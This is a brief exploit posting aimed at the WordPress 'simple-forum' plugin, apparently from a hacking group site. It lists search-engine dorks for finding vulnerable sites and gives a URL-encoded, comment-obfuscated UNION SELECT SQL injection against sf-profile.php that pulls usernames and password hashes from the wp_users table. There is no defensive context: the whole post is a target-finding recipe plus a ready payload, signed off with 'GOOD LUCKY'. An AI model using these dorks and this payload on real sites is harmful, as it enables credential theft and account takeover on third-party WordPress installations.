WordPress SQL Injection(wp-content-simple-forum)

###########
#
#
#   WordPress SQL Injection(wp-content-simple-forum)
#
###########
#
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
###########
#
#
#  DORKS 1 : allinurl :"wp-content/plugins/simple-forum"
#
#  DORK  2 : allinurl :"simple-forum/ahah"
#
###########
##

EXPLOIT :

wp-content/plugins/simple-forum/ahah/sf-profile.php?u=-999999%2F%2A%2A%2
Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C4%2Cconcat(0x7c,user
_login,0x7c,user_pass,0x7c)%2C6%2C7%2C8%2C0x7c%2F%2A%2A%2Ffrom%2F%2A%2A%
2Fwp_users

###########
# S@BUN      GOOD LUCKY       S@BUN
###########